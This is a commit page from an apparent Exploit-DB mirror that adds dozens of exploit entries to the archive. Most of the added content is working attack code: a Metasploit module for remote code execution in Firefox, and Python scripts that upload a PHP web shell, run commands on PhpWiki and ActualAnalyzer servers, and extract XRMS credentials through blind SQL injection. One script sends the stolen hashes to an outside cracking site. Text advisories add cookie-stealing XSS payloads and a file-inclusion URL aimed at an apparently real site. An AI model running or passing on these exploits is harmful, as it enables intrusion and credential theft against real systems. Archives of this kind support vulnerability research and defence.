bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 08_30_2014

Browse source
This commit is contained in:
Offensive Security 2014-08-30 04:42:49 +00:00
parent 3014afc96e
commit c93cd0e1b8
29 changed files with 1136 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

28
files.csv
View file

@ -31006,9 +31006,37 @@ id,file,description,date,author,platform,type,port
34421,platforms/linux/local/34421.c,"glibc Off-by-One NUL Byte gconv_translit_find Exploit",2014-08-27,"taviso and scarybeasts",linux,local,0
34424,platforms/php/webapps/34424.txt,"WooCommerce Store Exporter 1.7.5 - Multiple XSS Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0
34426,platforms/linux/remote/34426.txt,"uzbl \'uzbl-core\' \'@SELECTED_URI\' Mouse Button Bindings Command Injection Vulnerability",2010-08-05,Chuzz,linux,remote,0
34427,platforms/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption Vulnerability",2010-08-07,"Georgi Guninski",linux,dos,0
34428,platforms/windows/dos/34428.py,"Quintessential Media Player 5.0.121 '.m3u' File Buffer Overflow Vulnerability",2010-08-09,"Abhishek Lyall",windows,dos,0
34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0
34430,platforms/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps,0
34431,platforms/linux/remote/34431.html,"Nagios XI Multiple Cross Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0
34432,platforms/php/webapps/34432.txt,"Wowd 'index.html' Multiple Cross Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0
34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 'SDL2.php' Cross Site Scripting Vulnerability",2010-10-22,"Amol Naik",php,webapps,0
34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0
34437,platforms/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision Vulnerability",2010-08-11,"Florian Zumbiehl",windows,remote,0
34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 'Topic' Field HTML Injection Vulnerability",2010-08-11,3ethicalhackers.com,php,webapps,0
34439,platforms/multiple/remote/34439.txt,"ServletExec Directory Traversal Vulnerability and Multiple Authentication-Bypass Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0
34440,platforms/jsp/webapps/34440.txt,"Computer Associates Oneview Monitor 6.0 'doSave.jsp' Remote Code Execution Vulnerability",2010-08-12,"Giorgio Fedon",jsp,webapps,0
34441,platforms/php/webapps/34441.txt,"JForum 2.08 BBCode Color Tag HTML Injection Vulnerability",2010-05-13,"Giorgio Fedon",php,webapps,0
34442,platforms/windows/dos/34442.html,"Kylinsoft InstantGet 2.08 ActiveX Control 'ShowBar' Method Buffer Overflow Vulnerability",2009-09-19,the_Edit0r,windows,dos,0
34443,platforms/php/webapps/34443.txt,"PaoLink 1.0 'scrivi.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
34444,platforms/php/webapps/34444.txt,"RSSMediaScript 'index.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
34445,platforms/php/webapps/34445.txt,"LiveStreet 0.2 Comment Topic Header XSS",2009-08-31,Inj3ct0r,php,webapps,0
34446,platforms/php/webapps/34446.txt,"LiveStreet 0.2 include/ajax/blogInfo.php asd Parameter XSS",2009-08-31,Inj3ct0r,php,webapps,0
34447,platforms/php/webapps/34447.py,"Plogger 1.0-RC1 - Authenticated Arbitrary File Upload",2014-08-28,b0z,php,webapps,80
34448,platforms/multiple/remote/34448.rb,"Firefox WebIDL Privileged Javascript Injection",2014-08-28,metasploit,multiple,remote,0
34449,platforms/multiple/webapps/34449.txt,"ManageEngine DeviceExpert 5.9 - User Credential Disclosure",2014-08-28,"Pedro Ribeiro",multiple,webapps,0
34450,platforms/php/webapps/34450.py,"ActualAnalyzer Lite 2.81 - Unauthenticated Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80
34451,platforms/php/webapps/34451.py,"PhpWiki - Remote Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80
34452,platforms/php/webapps/34452.py,"XRMS - Blind SQL Injection and Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80
34453,platforms/php/webapps/34453.txt,"PaoBacheca 2.1 index.php URI XSS",2009-09-16,Moudi,php,webapps,0
34454,platforms/php/webapps/34454.txt,"PaoBacheca 2.1 scrivi.php URI XSS",2009-09-16,Moudi,php,webapps,0
34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 'news.php' Multiple SQL Injection Vulnerabilities",2010-08-12,Affix,php,webapps,0
34456,platforms/php/webapps/34456.txt,"JBoard Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0
34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - NULL Pointer Dereference Denial Of Service Vulnerability",2009-08-14,"Luigi Auriemma",multiple,dos,0
34458,platforms/windows/dos/34458.html,"Internet Explorer MS14-029 Memory Corruption PoC",2014-08-28,PhysicalDrive0,windows,dos,0
34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0
34460,platforms/windows/dos/34460.py,"Sonique 2.0 '.xpl' File Remote Stack-Based Buffer Overflow Vulnerability",2010-08-12,"Hamza_hack_dz & Black-liondz1",windows,dos,0
34463,platforms/windows/local/34463.py,"HTML Help Workshop 1.4 - (SEH) Buffer Overflow",2014-08-29,"Moroccan Kingdom (MKD)",windows,local,0
34464,platforms/php/webapps/34464.txt,"SyntaxCMS 'rows_per_page' Parameter SQL Injection Vulnerability",2010-08-10,"High-Tech Bridge SA",php,webapps,0

Can't render this file because it is too large.

9
platforms/jsp/webapps/34440.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42413/info
Computer Associates Oneview Monitor is prone to a remote code-execution vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to inject and execute arbitrary JSP code in the context of the affected webserver.
The following example URI is available:
ttp://www.example.com/sitemindermonitor/doSave.jsp?file=../attacksample.jsp

9
platforms/linux/dos/34427.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42306/info
OpenSSL is prone to a remote memory-corruption vulnerability.
Successfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the application using the vulnerable library. Failed exploit attempts will result in a denial-of-service condition.
The issue affects OpenSSL 1.0.0a; other versions may also be affected.
http://www.exploit-db.com/sploits/34427.zip

9
platforms/multiple/dos/34457.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42428/info
Sniper Elite is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.
Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
Versions prior to Sniper Elite 1.0 are vulnerable.
http://www.exploit-db.com/sploits/34457.zip

17
platforms/multiple/remote/34439.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/42411/info
ServletExec is prone to a directory-traversal vulnerability and multiple authentication-bypass vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to gain administrative access to the affected application and to obtain sensitive information that could aid in further attacks.
Versions prior to ServletExec 6.0.0.2_39 are vulnerable.
http://www.example.com/servlet/pagecompile._admin._help._helpContent_xjsp?page=../../WEB-INF/web.xml
http://www.example.com/servlet/pagecompile._admin._login_xjsp
http://www.example.com/servlet/pagecompile._admin._vmSystemProperties_xjsp
http://www.example.com/servlet/pagecompile._admin._SELogging_xjsp
http://www.example.com/servlet/pagecompile._admin._userMgt_xjsp
http://www.example.com/servlet/pagecompile._admin._virtualServers_xjsp
http://www.example.com/servlet/pagecompile._admin._optionalPackages_xjsp
http://www.example.com/servlet/pagecompile._admin._dataSources_xjsp
http://www.example.com/servlet/pagecompile._admin._debug_xjsp

150
platforms/multiple/remote/34448.rb Executable file
View file

@ -0,0 +1,150 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/exploitation/jsobfu'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::Remote::BrowserAutopwn
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
autopwn_info({
:ua_name => HttpClients::FF,
:ua_maxver => "22.0",
:ua_maxver => "27.0",
:javascript => true,
:rank => ExcellentRanking
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Firefox WebIDL Privileged Javascript Injection',
'Description' => %q{
This exploit gains remote code execution on Firefox 22-27 by abusing two
separate privilege escalation vulnerabilities in Firefox's Javascript
APIs.
},
'License' => MSF_LICENSE,
'Author' => [
'Marius Mlynski', # discovery and pwn2own exploit
'joev' # metasploit module
],
'DisclosureDate' => "Mar 17 2014",
'References' => [
['CVE', '2014-1510'], # open chrome:// url in iframe
['CVE', '2014-1511'] # bypass popup blocker to load bare ChromeWindow
],
'Targets' => [
[
'Universal (Javascript XPCOM Shell)', {
'Platform' => 'firefox',
'Arch' => ARCH_FIREFOX
}
],
[
'Native Payload', {
'Platform' => %w{ java linux osx solaris win },
'Arch' => ARCH_ALL
}
]
],
'DefaultTarget' => 0,
'BrowserRequirements' => {
:source => 'script',
:ua_name => HttpClients::FF,
:ua_ver => lambda { |ver| ver.to_i.between?(22, 27) }
}
))
register_options([
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
], self.class)
end
def on_request_exploit(cli, request, target_info)
send_response_html(cli, generate_html(target_info))
end
def generate_html(target_info)
key = Rex::Text.rand_text_alpha(5 + rand(12))
frame = Rex::Text.rand_text_alpha(5 + rand(12))
r = Rex::Text.rand_text_alpha(5 + rand(12))
opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
data_uri = "data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
"{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
"'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
js = Rex::Exploitation::JSObfu.new(%Q|
var opts = #{JSON.unparse(opts)};
var key = opts['#{key}'];
// Load the chrome-privileged browser XUL script into an iframe
var c = new mozRTCPeerConnection;
c.createOffer(function(){},function(){
window.open('chrome://browser/content/browser.xul', '#{frame}');
step1();
});
// Inject a data: URI into an internal frame inside of the browser
// XUL script to pop open a new window with the chrome flag to prevent
// the new window from being wrapped with browser XUL;
function step1() {
var clear = setInterval(function(){
// throws until frames[0].frames[2] is available (when chrome:// iframe loads)
frames[0].frames[2].location;
// we base64 this to avoid the script tag screwing up things when obfuscated
frames[0].frames[2].location=window.atob('#{Rex::Text.encode_base64(data_uri)}');
clearInterval(clear);
setTimeout(step2, 100);
},10);
}
// Step 2: load the chrome-level window up with a data URI, which
// gives us same-origin. Make sure to load an "<iframe mozBrowser>"
// into the frame, since that will respond to our messageManager
// (this is important later)
function step2() {
var clear = setInterval(function(){
top.vvv.location = 'data:text/html,<html><body><iframe mozBrowser '+
'src="about:blank"></iframe></body></html>';
clearInterval(clear);
setTimeout(step3, 100);
}, 10);
}
function step3() {
var clear = setInterval(function(){
if (!frames[0]) return; // will throw until the frame is accessible
top.vvv.messageManager.loadFrameScript('data:,'+key, false);
clearInterval(clear);
setTimeout(function(){top.vvv.close();}, 100);
}, 10);
}
|)
js.obfuscate
%Q|
<!doctype html>
<html>
<body>
<iframe id='#{frame}' name='#{frame}'
style='position:absolute;left:-9999999px;height:1px;width:1px;'>
</iframe>
<script>
#{js}
</script>
#{datastore['CONTENT']}
</body>
</html>
|
end
end

19
platforms/multiple/webapps/34449.txt Executable file
View file

@ -0,0 +1,19 @@
>> User credential disclosure in ManageEngine DeviceExpert 5.9
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
>> Background on the affected product:
"DeviceExpert is a webbased, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management."
>> Technical details:
Vulnerability: User credential disclosure / CVE-2014-5377
Constraints: no authentication or any other information needed.
Affected versions: UNFIXED as of 27/08/2014 - current version 5.9 build 5980 is vulnerable, older versions likely vulnerable
GET /ReadUsersFromMasterServlet
Example response:
<?xml version="1.0" encoding="UTF-8"?><discoveryresult><discoverydata><username>admin</username><userrole>Administrator</userrole><password>Ok6/FqR5WtJY5UCLrnvjQQ==</password><emailid>noreply@zohocorp.com</emailid><saltvalue>12345678</saltvalue></discoverydata></discoveryresult>
The passwords are a salted MD5 hash.

40
platforms/php/webapps/34436.txt Executable file
View file

@ -0,0 +1,40 @@
#################################################################################################
#
# Title : WordPress ShortCode Plugin - Local File Inclusion Vulnerability
# Severity : High+/Critical
# Reporter(s) : Mehdi Karout & Christian Galeone
# Google Dork : inurl:wp/wp-content/force-download.php
# Plugin Version : 1.1
# Plugin Name : Download ShortCode
# Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip
# Vendor Home : http://werdswords.com/
# Date : 25/08/2014
# Tested in : Win7 - Kali Linux
# CVE : CVE-2014-5465
#
##################################################################################################
#
# PoC :
#
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=[File]
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=../wp-config.php
#
# Exploit Code :
#
# $file = $_GET['file'];
# if(isset($file))
# {
# include("pages/$file");
# }
# else
# {
# include("index.php");
# }
#
# Demo :
#
# http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php
#
##################################################################################################

11
platforms/php/webapps/34438.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/42406/info
TagCloud is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
TagCloud version 2.0 is vulnerable; other versions may also be affected.
The following example input is available:
'Topic' Field: <script>javascript:alert("lolcats")</script>

28
platforms/php/webapps/34441.txt Executable file
View file

@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/42414/info
JForum is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
JForum 2.08 is vulnerable; other versions may also be affected.
Stored XSS - proof of concept for Firefox ("onMouseOver" is blacklisted):
[color=red' style='top:0px;left:0px;position:absolute;font-size:500;opacity:0' /onMouseOver='alert(document.cookie)']XSS4FF[/color]
Renders into the following HTML code:
<font color='red' style='top:0px;left:0px;position:absolute;font-size:500;opacity:0' /onMouseOver='alert(document.cookie)'>XSS4FF</font>
Stored XSS - proof of concept for Internet Explorer ("style" cannot contain parenthesis "(" ):
[color=red' /style='color:expression(alert(document.cookie))']XSS4IE[/color]
Renders into the following HTML code:
<font color='red' /style='color:expression(alert(document.cookie))'>XSS4IE</font>

10
platforms/php/webapps/34443.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/42420/info
PaoLink is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
PaoLink 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/paolink/demo/scrivi.php/"><script>alert(document.cookie);</script>

7
platforms/php/webapps/34444.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42421/info
RSSMediaScript is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/demo/index.php?cat=5&page=1"><script>alert(document.cookie);</script>

9
platforms/php/webapps/34445.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42422/info
LiveStreet is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
LiveStreet 0.2 is vulnerable; other versions may also be affected.
<img src =. onerror = alert ()>

11
platforms/php/webapps/34446.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/42422/info
LiveStreet is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
LiveStreet 0.2 is vulnerable; other versions may also be affected.
Cross Site Scripting:
/include/ajax/blogInfo.php?asd=<script>alert(&#039;www.example.com&#039;)</script>

82
platforms/php/webapps/34447.py Executable file
View file

@ -0,0 +1,82 @@
#!/usr/bin/env python
# Exploit Title: Plogger Authenticated Arbitrary File Upload
# Date: Feb 2014
# Exploit Author: b0z
# Vendor Homepage: www.plogger.org
# Software Link: www.plogger.org/download
# Version: Plogger prior to 1.0-RC1
# CVE : 2014-2223
import hashlib
import os
import zipfile
import requests
import time
import argparse
def login(session,host,username,password):
print "[+] Log in"
session.post('http://%s/plog-admin/plog-upload.php' % host, data={
"plog_username": username,
"plog_password": password,
"action": "log_in"
})
def upload(session):
print "[+] Creating poisoned gift"
## Write the backdoor
backdoor = open(magic + '.php', 'w+', buffering = 0)
backdoor.write("<?php system($_GET['cmd']) ?>")
backdoor.close
# Add true image file to block the race condition (mandatory not null)
image = open(magic + '.png', 'w+', buffering = 0)
image.write('A')
image.close
gift = zipfile.ZipFile(magic + '.zip', mode = 'w')
gift.write(magic + '.php')
gift.write(magic + '.png')
gift.close
os.remove(magic + '.php')
os.remove(magic + '.png')
gift = open(magic + '.zip', 'rb')
files= { "userfile": ("archive.zip", gift)}
session.post('http://%s/plog-admin/plog-upload.php' % host, files=files,
data = {
"destination_radio":"existing",
"albums_menu" : "1",
"new_album_name":"",
"collections_menu":"1",
"upload":"Upload"
})
os.remove(magic + '.zip')
print '[+] Here we go ==> http://%s/plog-content/uploads/archive/%s.php' % (host,magic)
if __name__== "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--host" , help="Remote host",required=True)
parser.add_argument("--user" , help="Username",required=True)
parser.add_argument("--password" , help="Password",required=True)
args = parser.parse_args()
host = args.host
username = args.user
password = args.user
magic = hashlib.sha1(time.asctime()).hexdigest()
session = requests.session()
login(session,host,username,password)
upload(session)

47
platforms/php/webapps/34450.py Executable file
View file

@ -0,0 +1,47 @@
###############################
# ActualAnalyzer exploit.
# Tested on Lite version
# We load command into a dummy variable as we only have 6 characters to own the eval
# but load more as first 2 characters get rm'd.
# We then execute the eval with backticks.
# 11/05/2011
##############################
import urllib
import urllib2
import sys
import time
def banner():
print " ____ __ __ __ "
print " / __/_ ______ _ ____ ______/ /___ ______ _/ /___ _____ ____ _/ /_ ______ ___ _____"
print " / /_/ / / / __ `// __ `/ ___/ __/ / / / __ `/ / __ `/ __ \/ __ `/ / / / /_ / / _ \/ ___/"
print " / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / /_/ / / /_/ / / /_/ __/ / "
print " /_/ \__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ /_/\__,_/_/\__, / /___/\___/_/ "
print " /_/ /____/ "
def usage():
print " [+] Usage:"
print " [-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c \"command\""
print " [-] python fuq.actualanalyzer.py -h test.com/lite -d analyticdomain -c \"touch /tmp/123\""
banner()
if len(sys.argv) < 6:
usage()
quit()
domain = sys.argv[2]
command = sys.argv[6]
host = syst.argv[4]
def commandexploit(domain,host,command):
url = 'http://' + domain + '/aa.php?anp=' + host
data = None
headers = {'Cookie': "ant=" + command + "; anm=414.`$cot`"}
exploit1 = urllib2.Request(url,data,headers)
exploit2 = urllib2.urlopen(exploit1)
commandexploit(domain,host,command)

53
platforms/php/webapps/34451.py Executable file
View file

@ -0,0 +1,53 @@
###############################################################
# ____ __ _ __ _
# / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_)
# / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ /
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /
#/_/ \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/
# /_/ /_/ /_/
# Diskovered in Nov/Dec 2011
###############################################################
import urllib
import urllib2
import sys
def banner():
print " ____ __ _ __ _ "
print " / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_)"
print " / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
print " / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / / "
print " /_/ \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ "
print " /_/ /_/ /_/ \n"
def usage():
banner()
print " [+] Usage example"
print " [-] python " + sys.argv[0] + " http://path.to/wiki"
if len(sys.argv)< 2:
usage()
quit()
domain = sys.argv[1]
def commandexec(cmd):
data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
cmd2 = urllib2.urlopen(cmd1)
output = cmd2.read()
firstloc = output.find("123:::\n") + len("123:::\n")
secondloc = output.find("\n:::123")
return output[firstloc:secondloc]
banner()
print commandexec('uname -a')
print commandexec('id')
while(quit != 1):
cmd = raw_input('Run a command: ')
if cmd == 'quit':
print "[-] Hope you had fun :)"
quit = 1
if cmd != 'quit':
print commandexec(cmd)

233
platforms/php/webapps/34452.py Executable file
View file

@ -0,0 +1,233 @@
#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################
import urllib
import urllib2
import time
import sys
usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
print """ ____
/ __/_ ______ _ _ ___________ ___ _____
/ /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
/ __/ /_/ / /_/ / _> </ / / / / / / (__ )
/_/ \__,_/\__, (_)_/|_/_/ /_/ /_/ /_/____/
/_/
[+] fuq th3 w0rld, fuq ur m0m!\n"""
def usage():
print " [+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
print " [+] Example:"
print " [+] python " + sys.argv[0] + " domain.to/xrms"
quit()
def sendhashaway(hash):
print " [+] Sending hash to icrackhash.com to be cracked."
data = None
headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
gh = urllib2.Request(url,data,headers)
gh2 = urllib2.urlopen(gh)
output = gh2.read()
plaintext = getpositions(output,'<td><small><strong>','</strong>')
print " [-] Plaintext of hash: " +plaintext + "\n"
return plaintext
def username(length):
length = length + 1
duser = []
#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
found = 0
i = 1
payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
payload2 = ",1)=CHAR("
payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
for i in range(1,length):
found = 0
while(found != 1):
for f in range(0,len(userascii)):
class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_302(self, req, fp, code, msg, headers):
infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
class HeadRequest(urllib2.Request):
def get_method(self):
return "POST"
payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
data = urllib.urlencode([('user_id',payload)])
url = 'http://'+domain+'/plugins/webform/new-form.php'
opener = urllib2.build_opener(LeHTTPRedirectHandler)
req = HeadRequest(url,data)
prepare = opener.open(req)
cookie1 = prepare.info()
cookie2pos1 = str(cookie1).find('PHPSESSID')
cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
line = 'XRMS' + line[9:]
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
headers = { 'Cookie' : line }
data = None
start = time.time()
get = urllib2.Request(url,data,headers)
get.get_method = lambda: 'HEAD'
try:
execute = urllib2.urlopen(get)
except:
pass
elapsed = (time.time() - start)
if(elapsed > 1):
print " Character found. Character is: " + usercharac[f]
duser.append(usercharac[f])
found = 1
return duser
def getusernamelength():
found = 0
i = 1
payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
while (found != 1):
class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_302(self, req, fp, code, msg, headers):
infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
class HeadRequest(urllib2.Request):
def get_method(self):
return "POST"
payload = payload1 + str(i) + payload2
data = urllib.urlencode([('user_id',payload)])
url = 'http://'+domain+'/plugins/webform/new-form.php'
opener = urllib2.build_opener(LeHTTPRedirectHandler)
req = HeadRequest(url,data)
prepare = opener.open(req)
cookie1 = prepare.info()
cookie2pos1 = str(cookie1).find('PHPSESSID')
cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
line = 'XRMS' + line[9:]
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
headers = { 'Cookie' : line }
data = None
start = time.time()
get = urllib2.Request(url,data,headers)
get.get_method = lambda: 'HEAD'
try:
execute = urllib2.urlopen(get)
except:
pass
elapsed = (time.time() - start)
if(elapsed > 1):
print " Length found at position: " + str(i)
found = 1
length = i
return length
i = i + 1
def password(length):
length = length + 1
dpassword = []
#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
found = 0
i = 1
payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
payload2 = ",1)=CHAR("
payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
for i in range(1,length):
found = 0
while(found != 1):
for f in range(0,len(userascii)):
class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_302(self, req, fp, code, msg, headers):
infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
class HeadRequest(urllib2.Request):
def get_method(self):
return "POST"
payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
data = urllib.urlencode([('user_id',payload)])
url = 'http://'+domain+'/plugins/webform/new-form.php'
opener = urllib2.build_opener(LeHTTPRedirectHandler)
req = HeadRequest(url,data)
prepare = opener.open(req)
cookie1 = prepare.info()
cookie2pos1 = str(cookie1).find('PHPSESSID')
cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
line = 'XRMS' + line[9:]
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
headers = { 'Cookie' : line }
data = None
start = time.time()
get = urllib2.Request(url,data,headers)
get.get_method = lambda: 'HEAD'
try:
execute = urllib2.urlopen(get)
except:
pass
elapsed = (time.time() - start)
if(elapsed > 1):
print " Character found. Character is: " + usercharac[f]
dpassword.append(usercharac[f])
found = 1
return dpassword
def login(domain,user,password):
cookie = "XRMS=iseeurgettinown4d"
url = 'http://'+domain+'/login-2.php'
headers = { 'Cookie' : cookie }
data = urllib.urlencode([('username',user),('password',password)])
a1 = urllib2.Request(url,data,headers)
a2 = urllib2.urlopen(a1)
output = a2.read()
if output.find('PEAR.php') > 0:
print " [+] Logged In"
def commandexec(domain,command):
cookie = "XRMS=iseeurgettinown4d"
cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
headers = { 'Cookie' : cookie }
data = None
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
b1 = urllib2.Request(url,data,headers)
b2 = urllib2.urlopen(a1)
output = b2.read()
first = output.find('0x41') + 4
last = output.find('14x0') - 4
return output[first:last]
banner()
if len(sys.argv) < 2:
usage()
domain = sys.argv[1]
print " [+] Grabbing username length"
